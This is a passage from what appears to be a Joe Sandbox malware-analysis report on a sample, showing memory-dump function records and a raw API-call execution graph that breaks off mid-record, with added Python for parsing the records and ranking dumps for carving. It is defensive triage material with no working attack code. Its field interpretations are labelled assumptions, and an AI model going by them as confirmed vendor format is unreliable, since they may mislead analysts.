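            cur["process_index"] = int(fields[0])    # assumption: 1st field = process index
            cur["region_base"] = int(fields[3], 16)  # 4th field equals 'Offset' throughout the page
            cur["offset"] = int(m["offset"], 16)
            cur["pe_backed"] = m["pe"] == "true"
        elif m := FIELD_RE.match(line):
            cur[m["key"].lower().replace(" ", "_")] = m["value"]
            if m["key"] == "Instruction Fuzzy Hash":
                blocks.append(cur)
                cur = None
    return blocks

def group_by_opcode_id(blocks):
    """Opcode ID -> API IDs of the functions sharing it: same opcode sequence,
    different operands (e.g. which import is called), i.e. one stub pattern."""
    groups = defaultdict(list)
    for b in blocks:
        groups[b["opcode_id"]].append(b.get("api_id", ""))
    return dict(groups)

def apis_outside_pe(blocks):
    """API references made from regions the sandbox could not map to a PE
    image ('based on PE: false'): code that existed only at run time."""
    return [(f"{api}.{mod}", ref, b["process_index"], b["region_base"])
            for b in blocks if not b["pe_backed"] for api, mod, ref in b["apis"]]

def fuzzy_similarity(h1, h2):
    """Fraction of nibble positions on which two Instruction Fuzzy Hashes agree.
    Stand-in metric (assumption); the page does not give the vendor's own."""
    if len(h1) != len(h2):
        raise ValueError("fuzzy hashes differ in length")
    return sum(a == b for a, b in zip(h1, h2)) / len(h1)

def nearest_by_fuzzy_hash(blocks, api_id):
    """Other blocks ranked by fuzzy-hash similarity to the block with api_id."""
    ref = next(b for b in blocks if b.get("api_id") == api_id)
    scored = [(b.get("api_id"), round(fuzzy_similarity(
        ref["instruction_fuzzy_hash"], b["instruction_fuzzy_hash"]), 3))
              for b in blocks if b is not ref]
    return sorted(scored, key=lambda t: t[1], reverse=True)
```

Run `parse_blocks(REPORT_EXCERPT)` and feed the result to the three pivots. On this excerpt the DispatchMessage and ErrorMode records share Opcode ID eef9aef4..., so the functions at 00FFBF10 and 00FFAAAC are one wrapper shape calling different imports and can be triaged together; every API reference comes from a non-PE-backed region (process index 3, bases 00FFA000 and 01130000), which is where an analyst should dump and carve rather than in the file on disk; and ErrorMode ranks as the nearest neighbour of DispatchMessage by fuzzy hash (53 of 70 positions agree), ahead of Timer and the unrelated records.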

Memory Dump Source
• Source File: 00000003.00000002.4198716646.0000000001140000.00000040.00000020.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1140000_essam@sasa2023.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dbeaeff5a6b88fb3730c9fb21e641703a0cc9e1b3e3a6d990314eb5ac02bf3bb
• Instruction ID: 3c5e6af733cccfba5cda9f2673ba9ae749450bcc037cb178471096832f03536a
• Opcode Fuzzy Hash: dbeaeff5a6b88fb3730c9fb21e641703a0cc9e1b3e3a6d990314eb5ac02bf3bb
• Instruction Fuzzy Hash: F811D531604285DFD719CB15C940B65BB91EB8CB08F24C5ACEA490B653C73BD803CA82
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.4198716646.0000000001140000.00000040.00000020.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1140000_essam@sasa2023.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a37a04906ece53fb68f0160aca7e9aaf92822ffea8636ab169d15583348af3e0
• Instruction ID: 3d572d8eb1c2a4ea654d45564532f63988d882246b187a128382ae53114f5ac2
• Opcode Fuzzy Hash: a37a04906ece53fb68f0160aca7e9aaf92822ffea8636ab169d15583348af3e0
• Instruction Fuzzy Hash: 8B01D6B65083806FD711CF05DC40862FFE8EB86220709C49BEC4D8B652D225A908C772
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.4198716646.0000000001140000.00000040.00000020.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1140000_essam@sasa2023.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f902b924b0578d6a90f40ca702b0aad2087c37c45f1b07a08c1e9c331ea496b8
• Instruction ID: 1a09a9b6b956008b1d20b5191e4c56f79d6d12e991e7476e8c00781c30d7a3e9
• Opcode Fuzzy Hash: f902b924b0578d6a90f40ca702b0aad2087c37c45f1b07a08c1e9c331ea496b8
• Instruction Fuzzy Hash: 14115235508281CFD716CB11C990B55BFB1EB8A708F29C6EEE5494B663C33AD817CB41
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.4198716646.0000000001140000.00000040.00000020.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1140000_essam@sasa2023.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d3010c68608ddeec498cba65a171c649a7937eae4883e58b56871c4c4f39c97b
• Instruction ID: 9aac12912f97bce9111874eaf5a36cb4aaa8c4f3a0a32db9593ba892b81bd07c
• Opcode Fuzzy Hash: d3010c68608ddeec498cba65a171c649a7937eae4883e58b56871c4c4f39c97b
• Instruction Fuzzy Hash: 6EF01D35508645DFC306CF45D940B55FBA2EB89B18F24CAADE9491BB62C337D813DA81
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.4198716646.0000000001140000.00000040.00000020.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1140000_essam@sasa2023.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a5b8774048334801738b7fd5b945de70eb5a409119aae0ab99ebccef9f58e926
                                                                                                                                                                    • Instruction ID: f2fb6986e5f190534a8d0ebe2f0d4a4bdf2b905c6bbdf0025f1d89f78d328c29
                                                                                                                                                                    • Opcode Fuzzy Hash: a5b8774048334801738b7fd5b945de70eb5a409119aae0ab99ebccef9f58e926
                                                                                                                                                                    • Instruction Fuzzy Hash: 40E092B66006049B9650CF0AEC41462F7D4EBC4630B08C07FDC0D8B701EA3AB508CAA6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194819176.0000000000FF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF2000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ff2000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 37f0726c10d0e85e8e241f1f0ea8920096ecf606ea41d26ae922897425115b26
                                                                                                                                                                    • Instruction ID: 169c8babbbdb71349d7d4b7d14928c1fb1f0b8b1f0950a66df33ac6dde7ead3b
                                                                                                                                                                    • Opcode Fuzzy Hash: 37f0726c10d0e85e8e241f1f0ea8920096ecf606ea41d26ae922897425115b26
                                                                                                                                                                    • Instruction Fuzzy Hash: 64D05E79604AC14FD317CA1CC5A4BA63794AF51714F4A44FAAC00CB773CBA8D9C1E210
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194819176.0000000000FF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF2000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ff2000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 64a3bbc1a3b702cef650f0b21bdc18f8756fc25ddd273da6b2bc412941880da6
                                                                                                                                                                    • Instruction ID: 34cb55980679c566e6eb596832c83b44393d66c9514267053b767b5bb684a84d
                                                                                                                                                                    • Opcode Fuzzy Hash: 64a3bbc1a3b702cef650f0b21bdc18f8756fc25ddd273da6b2bc412941880da6
                                                                                                                                                                    • Instruction Fuzzy Hash: CED05E746006854BC715CA0CC6E4F6937D4AF40714F0644E8AC508B772CBA8D9C4EA00
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%
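
The records above all come from two memory dumps of process 3 (regions at 0x1140000 and 0xFF2000, both "based on PE: false"), and their file names encode the properties an analyst wants before opening them. The Python below is an added example, not code from the Joe Sandbox report or its tooling: it parses records in exactly this text layout (SAMPLE copies two of the records above), decodes the .sdmp file name, flags the dumps that are RWX, MEM_PRIVATE and not PE-backed (where unpacked or injected code usually lands, so those get carved and scanned first), and cross-references Opcode IDs to find one function body living in several dumps. Treating the fifth dotted field as the page protection, the seventh as the region type and the first two as process/stage indices is an assumption of this example, marked in the code; the empty API ID / String ID lines and the -1.00% uniqueness placeholder are handled explicitly.

```python
"""Added example (not Joe Sandbox code): parse the per-function records Joe Sandbox
prints under each memory dump, decode the .sdmp file name and pick out the dumps
worth carving first. SAMPLE copies two records from this report."""
import re
from collections import defaultdict
from typing import Dict, List

PAGE_PROTECTION = {  # Win32 PAGE_* constants; only the low byte is the protection class
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# <process>.<stage>.<timestamp>.<base>.<protection>.<f6>.<type>.<f8>.sdmp
# ASSUMPTION of this example: field 5 is the page protection and field 7 the region
# type; the first two are process/stage indices; fields 6 and 8 are returned raw.
SDMP_RE = re.compile(r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})\."
                     r"([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$")
SOURCE_RE = re.compile(r"^(\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)$")
FIELDS = {"Snapshot File": "snapshot", "Opcode ID": "opcode_id", "Instruction ID": "instruction_id",
          "Opcode Fuzzy Hash": "opcode_fuzzy", "Instruction Fuzzy Hash": "instruction_fuzzy"}


def parse_records(text: str) -> List[dict]:
    """One dict per function. A record starts at each 'Source File:' line; empty
    API ID / String ID lines are skipped and the -1.00% uniqueness sentinel becomes None."""
    records: List[dict] = []
    for raw in text.splitlines():
        key, sep, value = raw.strip().lstrip("•").strip().partition(":")
        key, value = key.strip(), value.strip()
        if not sep:
            continue  # headings such as 'Similarity' or 'Memory Dump Source' carry no data
        if key == "Source File":
            m = SOURCE_RE.match(value)
            if not m:
                raise ValueError(f"unrecognised Source File line: {value}")
            records.append({"source_file": m.group(1), "offset": int(m.group(2), 16),
                            "based_on_pe": m.group(3) == "true", "uniqueness": None})
        elif records and value and key in FIELDS:
            records[-1][FIELDS[key]] = value
        elif records and key == "Uniqueness Score":
            score = float(value.rstrip("%"))
            records[-1]["uniqueness"] = None if score < 0 else score
    return records


def decode_sdmp_name(name: str) -> Dict[str, object]:
    """Split a .sdmp file name into its fields (see the ASSUMPTION note above)."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    prot, mtype = int(m.group(5), 16), int(m.group(7), 16)
    return {"process": int(m.group(1), 16), "stage": int(m.group(2), 16), "base": int(m.group(4), 16),
            "protection": PAGE_PROTECTION.get(prot & 0xFF, hex(prot)),
            "type": MEM_TYPE.get(mtype, hex(mtype)), "field6": m.group(6), "field8": m.group(8)}


def suspicious_dumps(records: List[dict]) -> List[str]:
    """Distinct dumps that are RWX, MEM_PRIVATE and not PE-backed: the usual home of
    unpacked or injected code, so carve and scan these before the image dumps."""
    out: List[str] = []
    for rec in records:
        info = decode_sdmp_name(rec["source_file"])
        if (not rec["based_on_pe"] and info["protection"] == "PAGE_EXECUTE_READWRITE"
                and info["type"] == "MEM_PRIVATE" and rec["source_file"] not in out):
            out.append(rec["source_file"])
    return out


def shared_opcode_ids(records: List[dict]) -> Dict[str, List[str]]:
    """Opcode IDs seen in more than one dump: the same function body in several regions."""
    where: Dict[str, List[str]] = defaultdict(list)
    for rec in records:
        if rec["source_file"] not in where[rec.get("opcode_id", "")]:
            where[rec.get("opcode_id", "")].append(rec["source_file"])
    return {k: v for k, v in where.items() if len(v) > 1}


SAMPLE = """\
Memory Dump Source
• Source File: 00000003.00000002.4198716646.0000000001140000.00000040.00000020.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1140000_essam@sasa2023.jbxd
• API ID:
• String ID:
• API String ID:
• Opcode ID: a5b8774048334801738b7fd5b945de70eb5a409119aae0ab99ebccef9f58e926
• Instruction ID: f2fb6986e5f190534a8d0ebe2f0d4a4bdf2b905c6bbdf0025f1d89f78d328c29
• Opcode Fuzzy Hash: a5b8774048334801738b7fd5b945de70eb5a409119aae0ab99ebccef9f58e926
• Instruction Fuzzy Hash: 40E092B66006049B9650CF0AEC41462F7D4EBC4630B08C07FDC0D8B701EA3AB508CAA6
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000003.00000002.4194819176.0000000000FF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF2000, based on PE: false
• Snapshot File: hcaresult_3_2_ff2000_essam@sasa2023.jbxd
• Opcode ID: 37f0726c10d0e85e8e241f1f0ea8920096ecf606ea41d26ae922897425115b26
• Instruction ID: 169c8babbbdb71349d7d4b7d14928c1fb1f0b8b1f0950a66df33ac6dde7ead3b
• Opcode Fuzzy Hash: 37f0726c10d0e85e8e241f1f0ea8920096ecf606ea41d26ae922897425115b26
• Instruction Fuzzy Hash: 64D05E79604AC14FD317CA1CC5A4BA63794AF51714F4A44FAAC00CB773CBA8D9C1E210
Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for name in suspicious_dumps(recs):
        print(name, decode_sdmp_name(name))
    print("functions shared across dumps:", shared_opcode_ids(recs) or "none")
```

Run stand-alone it flags both dumps (RWX, private, no PE header) and reports no shared function bodies, since the two sample records carry different Opcode IDs; fed the whole disassembly section of a report, the Opcode ID cross-reference is what tells you a region is a relocated copy of code already seen elsewhere rather than new code.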

Execution Graph

Execution Coverage: 14.1%
Dynamic/Decrypted Code Coverage: 5.3%
Signature Coverage: 0.8%
Total number of Nodes: 1687
Total number of Limit Nodes: 57
execution_graph: the node/edge data behind the interactive graph (node ID, function address, resolved API names, "a->b" edges), which is unreadable as text; this copy also stops mid-record at node 72493. What the node labels themselves show:
• Two native code ranges are walked, 698dxxxx to 6990xxxx and 69dbxxxx to 69ddxxxx. Both carry MSVC CRT symbols (__EH_prolog3, __EH_prolog3_GS, __getptd_noexit, __dosmaperr, __calloc_crt, _DecodePointerInternal / _EncodePointerInternal, __CRT_INIT@12, ___DllMainCRTStartup, __RTC_Initialize, __setmbcp, __mtterm, __freefls@4, ___freetlocinfo, std::bad_exception::bad_exception), so this is statically linked CRT code in DLLs with a DllMain, not the sample's managed code.
• Window and dialog handling: SetWindowLongW, GetWindowLongW, GetParent, GetWindow, SendMessageW, PostMessageW, GetDlgItem, SetDlgItemTextW, SetWindowTextW, GetWindowRect, GetClientRect, MapWindowPoints, SetWindowPos, MonitorFromWindow, GetMonitorInfoW, LoadImageW, CreateWindowExW, GetWindowTextLengthW, GetWindowPlacement, KiUserCallbackDispatcher, RaiseException.
• Resource and path handling: FindResourceExW, FindResourceW, LoadResource, LockResource, SizeofResource, GetModuleFileNameW, PathRemoveFileSpecW, PathAppendW, FormatMessageW, LocalFree.
• File output: WriteFile, FlushFileBuffers, GetLastError.
• CRT start-up and teardown: GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter (the __security_init_cookie sequence, present in both ranges at 69dce588 and 698fada3), HeapCreate, HeapDestroy, RtlAllocateHeap, RtlReAllocateHeap, HeapFree, TlsAlloc, TlsGetValue, TlsSetValue, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, GetModuleHandleW, GetProcAddress, ExitProcess, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, WideCharToMultiByte, GetStartupInfoW, GetStdHandle, GetFileType, SetHandleCount, Sleep, SetLastError, GetCurrentProcess, FlushInstructionCache.
• Fault reporting: IsDebuggerPresent (698f87cb) is reached only from ___crtMessageBoxW (698f87c1), and SetUnhandledExceptionFilter / UnhandledExceptionFilter (698faf10) with GetCurrentProcess / TerminateProcess (698faf35) sit under __call_reportfault. These are the CRT's own invalid-parameter and abort paths, so this IsDebuggerPresent call is not in itself an anti-debugging check.
API calls __mtterm 72380->72493 72382->72359 72384 698f854e __RTC_Initialize 72387 698f8552 72384->72387 72393 698f855e GetCommandLineA 72384->72393 72484 698faa08 HeapDestroy 72387->72484 72388 698f85e1 72491 698f9a67 70 API calls ___freetlocinfo 72388->72491 72389 698f8636 _DecodePointerInternal 72395 698f864b 72389->72395 72392 698f85e6 72492 698faa08 HeapDestroy 72392->72492 72442 698fa8f3 GetEnvironmentStringsW 72393->72442 72398 698f864f 72395->72398 72399 698f8666 72395->72399 72501 698f9aa9 66 API calls 4 library calls 72398->72501 72502 698f8e26 66 API calls 2 library calls 72399->72502 72404 698f8656 GetCurrentThreadId 72404->72382 72405 698f857c 72485 698f9a67 70 API calls ___freetlocinfo 72405->72485 72408 698f8588 72409 698f859c 72408->72409 72468 698fa5b3 72408->72468 72415 698f85a1 72409->72415 72488 698fa55b 67 API calls ___freetlocinfo 72409->72488 72412 698f85b1 72412->72405 72415->72382 72416->72373 72418 698f9dba 72417->72418 72419 698f9dc3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 72417->72419 72504 698f9a67 70 API calls ___freetlocinfo 72418->72504 72421 698f9e0d TlsAlloc 72419->72421 72424 698f9e5b TlsSetValue 72421->72424 72426 698f9f1c 72421->72426 72423 698f9dbf 72423->72384 72425 698f9e6c 72424->72425 72424->72426 72505 698fa07d _EncodePointerInternal _EncodePointerInternal __init_pointers _raise __initp_misc_winsig 72425->72505 72426->72384 72428 698f9e71 _EncodePointerInternal _EncodePointerInternal _EncodePointerInternal _EncodePointerInternal 72506 698fe872 InitializeCriticalSectionAndSpinCount 72428->72506 72430 698f9eb0 72431 698f9f17 72430->72431 72432 698f9eb4 _DecodePointerInternal 72430->72432 72508 698f9a67 70 API calls ___freetlocinfo 72431->72508 72434 698f9ec9 72432->72434 72434->72431 72435 698f9f70 __calloc_crt 66 API calls 72434->72435 72436 698f9edf 72435->72436 72436->72431 72437 698f9ee7 _DecodePointerInternal 72436->72437 72438 698f9ef8 72437->72438 72438->72431 72439 698f9efc 72438->72439 72507 
698f9aa9 66 API calls 4 library calls 72439->72507 72441 698f9f04 GetCurrentThreadId 72441->72426 72443 698fa90f WideCharToMultiByte 72442->72443 72444 698f856e 72442->72444 72446 698fa97c FreeEnvironmentStringsW 72443->72446 72447 698fa944 72443->72447 72455 698fa311 GetStartupInfoW 72444->72455 72446->72444 72509 698f9f26 66 API calls _malloc 72447->72509 72449 698fa94a 72449->72446 72450 698fa952 WideCharToMultiByte 72449->72450 72451 698fa964 72450->72451 72452 698fa970 FreeEnvironmentStringsW 72450->72452 72510 698f8e26 66 API calls 2 library calls 72451->72510 72452->72444 72454 698fa96c 72454->72452 72456 698f9f70 __calloc_crt 66 API calls 72455->72456 72467 698fa32f 72456->72467 72457 698fa4da GetStdHandle 72465 698fa4a4 72457->72465 72458 698f9f70 __calloc_crt 66 API calls 72458->72467 72459 698fa53e SetHandleCount 72460 698f8578 72459->72460 72460->72405 72486 698fa833 95 API calls 3 library calls 72460->72486 72461 698fa4ec GetFileType 72461->72465 72462 698fa424 72463 698fa45b InitializeCriticalSectionAndSpinCount 72462->72463 72464 698fa450 GetFileType 72462->72464 72462->72465 72463->72460 72463->72462 72464->72462 72464->72463 72465->72457 72465->72459 72465->72461 72466 698fa512 InitializeCriticalSectionAndSpinCount 72465->72466 72466->72460 72466->72465 72467->72458 72467->72460 72467->72462 72467->72465 72467->72467 72469 698fa5bc 72468->72469 72473 698fa5c1 _strlen 72468->72473 72511 698fe318 94 API calls __setmbcp 72469->72511 72471 698f8591 72471->72409 72487 698fa0de 77 API calls 4 library calls 72471->72487 72472 698f9f70 __calloc_crt 66 API calls 72476 698fa5f6 _strlen 72472->72476 72473->72471 72473->72472 72474 698fa645 72513 698f8e26 66 API calls 2 library calls 72474->72513 72476->72471 72476->72474 72477 698f9f70 __calloc_crt 66 API calls 72476->72477 72478 698fa66b 72476->72478 72481 698fa682 72476->72481 72512 698fede1 66 API calls _raise 72476->72512 72477->72476 72514 698f8e26 66 API calls 2 library calls 72478->72514 72515 698fb4b8 
10 API calls __call_reportfault 72481->72515 72483 698fa68e 72484->72382 72485->72387 72486->72408 72487->72409 72488->72412 72489->72375 72490->72388 72491->72392 72492->72380 72493->72382 72494->72377 72497 698f9f79 72495->72497 72498 698f862a 72497->72498 72499 698f9f97 Sleep 72497->72499 72516 698fd6dc 72497->72516 72498->72382 72498->72389 72500 698f9fac 72499->72500 72500->72497 72500->72498 72501->72404 72502->72382 72503->72382 72504->72423 72505->72428 72506->72430 72507->72441 72508->72426 72509->72449 72510->72454 72511->72473 72512->72476 72513->72471 72514->72471 72515->72483 72517 698fd6e8 72516->72517 72521 698fd703 72516->72521 72518 698fd6f4 72517->72518 72517->72521 72525 698fb570 66 API calls __getptd_noexit 72518->72525 72520 698fd716 RtlAllocateHeap 72520->72521 72524 698fd73d 72520->72524 72521->72520 72521->72524 72526 698fda46 _DecodePointerInternal 72521->72526 72522 698fd6f9 72522->72497 72524->72497 72525->72522 72526->72521 72527 69da830c 72534 69daf821 72527->72534 72590 69da76a7 72534->72590 72591 69da76b3 __EH_prolog3 72590->72591 72624 69dcc0aa 72591->72624 72594 69da7716 72644 69d777af RegOpenKeyExW 72594->72644 72598 69dcc0aa ctype 77 API calls 72599 69da772f GetModuleHandleW 72598->72599 72601 69da776f SetUnhandledExceptionFilter GetCommandLineW 72599->72601 72602 69da7752 GetProcAddress 72599->72602 72652 69d73e77 72601->72652 72602->72601 72603 69da7769 SetThreadStackGuarantee 72602->72603 72603->72601 72605 69da778a 72764 69db9293 GetCommandLineW 72605->72764 72611 69da77c5 72832 69d741d6 72611->72832 72627 69dcc0b4 72624->72627 72626 69da7704 72626->72594 72636 69d77c6e 72626->72636 72627->72626 72630 69dcc0d0 std::exception::exception 72627->72630 72840 69dcbfb3 72627->72840 72857 69dd1247 _DecodePointerInternal 72627->72857 72634 69dcc10e 72630->72634 72858 69dcb1d7 76 API calls __cinit 72630->72858 72631 69dcc118 72860 69dd14aa 72631->72860 72859 69dd13ee 66 API calls std::exception::operator= 72634->72859 72635 69dcc129 
72637 69d77c7a __EH_prolog3 72636->72637 72871 69dc8e54 72637->72871 72640 69dc8e54 ctype KiUserExceptionDispatcher 72641 69d77cba 72640->72641 72875 69d77ce8 72641->72875 72643 69d77cd9 ctype 72643->72594 72645 69d777f2 RegCreateKeyExW 72644->72645 72646 69d7785b RegCloseKey 72644->72646 72645->72646 72647 69d7780f 72645->72647 72648 69dcb091 __call_reportfault 5 API calls 72646->72648 73116 69d7787b 72647->73116 72650 69d77874 72648->72650 72650->72598 72651 69d7781a RegSetValueExW RegSetValueExW 72651->72646 72653 69d73e83 __EH_prolog3 72652->72653 72654 69da833e ctype 110 API calls 72653->72654 72655 69d73e9f 72654->72655 72656 69d7419a ctype 72655->72656 72657 69da833e ctype 110 API calls 72655->72657 72656->72605 72658 69d73eca 72657->72658 73192 69da9067 72658->73192 72660 69d73ed6 72661 69dc8f0e ctype RtlFreeHeap 72660->72661 72662 69d73ee5 72661->72662 72663 69da833e ctype 110 API calls 72662->72663 72664 69d73ef3 72663->72664 72665 69da9067 ctype 71 API calls 72664->72665 72666 69d73eff 72665->72666 72667 69dc8f0e ctype RtlFreeHeap 72666->72667 72668 69d73f0e 72667->72668 72669 69da833e ctype 110 API calls 72668->72669 72670 69d73f1c 72669->72670 72671 69da9067 ctype 71 API calls 72670->72671 72672 69d73f28 72671->72672 72673 69dc8f0e ctype RtlFreeHeap 72672->72673 72674 69d73f37 72673->72674 72675 69da833e ctype 110 API calls 72674->72675 72676 69d73f45 72675->72676 72677 69da9067 ctype 71 API calls 72676->72677 72678 69d73f51 72677->72678 72679 69dc8f0e ctype RtlFreeHeap 72678->72679 72680 69d73f60 72679->72680 72681 69da833e ctype 110 API calls 72680->72681 72682 69d73f6e 72681->72682 72683 69da9067 ctype 71 API calls 72682->72683 72684 69d73f7a 72683->72684 72685 69dc8f0e ctype RtlFreeHeap 72684->72685 72686 69d73f89 72685->72686 72687 69da833e ctype 110 API calls 72686->72687 72688 69d73f97 72687->72688 72689 69da9067 ctype 71 API calls 72688->72689 72690 69d73fa3 72689->72690 72691 69dc8f0e ctype RtlFreeHeap 72690->72691 72692 69d73fb2 72691->72692 
72693 69da833e ctype 110 API calls 72692->72693 72694 69d73fc0 72693->72694 72695 69da9067 ctype 71 API calls 72694->72695 72696 69d73fcc 72695->72696 72697 69dc8f0e ctype RtlFreeHeap 72696->72697 72698 69d73fdb 72697->72698 72699 69da833e ctype 110 API calls 72698->72699 72700 69d73fe9 72699->72700 72701 69da9067 ctype 71 API calls 72700->72701 72702 69d73ff5 72701->72702 72703 69dc8f0e ctype RtlFreeHeap 72702->72703 72704 69d74004 72703->72704 72705 69da833e ctype 110 API calls 72704->72705 72706 69d74012 72705->72706 72707 69da9067 ctype 71 API calls 72706->72707 72708 69d7401e 72707->72708 72709 69dc8f0e ctype RtlFreeHeap 72708->72709 72710 69d7402d 72709->72710 72711 69da833e ctype 110 API calls 72710->72711 72712 69d7403b 72711->72712 72713 69da9067 ctype 71 API calls 72712->72713 72714 69d74047 72713->72714 72715 69dc8f0e ctype RtlFreeHeap 72714->72715 72716 69d74056 72715->72716 72717 69da833e ctype 110 API calls 72716->72717 72718 69d74064 72717->72718 72719 69da9067 ctype 71 API calls 72718->72719 72720 69d74070 72719->72720 72721 69dc8f0e ctype RtlFreeHeap 72720->72721 72722 69d7407f 72721->72722 72723 69da833e ctype 110 API calls 72722->72723 72724 69d7408d 72723->72724 72725 69da9067 ctype 71 API calls 72724->72725 72726 69d74099 72725->72726 72727 69dc8f0e ctype RtlFreeHeap 72726->72727 72728 69d740a8 72727->72728 72729 69da833e ctype 110 API calls 72728->72729 72730 69d740b6 72729->72730 72731 69da9067 ctype 71 API calls 72730->72731 72732 69d740c2 72731->72732 72733 69dc8f0e ctype RtlFreeHeap 72732->72733 72734 69d740d1 72733->72734 72735 69da833e ctype 110 API calls 72734->72735 72736 69d740df 72735->72736 72737 69da9067 ctype 71 API calls 72736->72737 72738 69d740eb 72737->72738 72739 69dc8f0e ctype RtlFreeHeap 72738->72739 72740 69d740fa 72739->72740 72741 69da833e ctype 110 API calls 72740->72741 72742 69d74108 72741->72742 72743 69da9067 ctype 71 API calls 72742->72743 72744 69d74114 72743->72744 72745 69dc8f0e ctype RtlFreeHeap 72744->72745 
72746 69d74123 72745->72746 72747 69da833e ctype 110 API calls 72746->72747 72748 69d74131 72747->72748 72749 69da9067 ctype 71 API calls 72748->72749 72750 69d7413d 72749->72750 72751 69dc8f0e ctype RtlFreeHeap 72750->72751 72752 69d7414c 72751->72752 72753 69da833e ctype 110 API calls 72752->72753 72754 69d7415a 72753->72754 72755 69da9067 ctype 71 API calls 72754->72755 72756 69d74166 72755->72756 72757 69dc8f0e ctype RtlFreeHeap 72756->72757 72758 69d74175 72757->72758 72759 69da833e ctype 110 API calls 72758->72759 72760 69d74183 72759->72760 72761 69da9067 ctype 71 API calls 72760->72761 72762 69d7418f 72761->72762 72763 69dc8f0e ctype RtlFreeHeap 72762->72763 72763->72656 72765 69d73e77 ctype 114 API calls 72764->72765 72766 69db92d0 72765->72766 73237 69d74486 72766->73237 72769 69dc8f0e ctype RtlFreeHeap 72770 69db92f4 72769->72770 72776 69db92f8 72770->72776 73240 69d7423c 111 API calls ctype 72770->73240 72772 69d741a9 ctype 67 API calls 72774 69da7793 72772->72774 72773 69db9320 72775 69d73a16 ctype 111 API calls 72773->72775 72773->72776 72777 69d7420c 72774->72777 72775->72776 72776->72772 72778 69d741d6 111 API calls 72777->72778 72779 69d74216 72778->72779 72780 69d73a16 ctype 111 API calls 72779->72780 72781 69d7422a 72779->72781 72780->72781 72782 69d73a16 72781->72782 72783 69d73a22 __EH_prolog3 72782->72783 72784 69da833e ctype 110 API calls 72783->72784 72785 69d73a36 72784->72785 73321 69da88d1 72785->73321 72788 69dc8eab std::bad_exception::bad_exception 67 API calls 72789 69d73a50 72788->72789 72790 69da88d1 ctype 102 API calls 72789->72790 72791 69d73a62 72790->72791 73328 69da8cd5 72791->73328 72793 69d73a73 73334 69da8c7a 72793->73334 72795 69d73a8f ctype 72796 69da8cd5 ctype 101 API calls 72795->72796 72802 69d73ad6 ctype 72795->72802 72797 69d73abc 72796->72797 72798 69da8c7a ctype 101 API calls 72797->72798 72798->72802 72799 69d73b0c 72801 69d73b1f 72799->72801 72803 69dc8f0e ctype RtlFreeHeap 72799->72803 72800 69dc8f0e ctype 
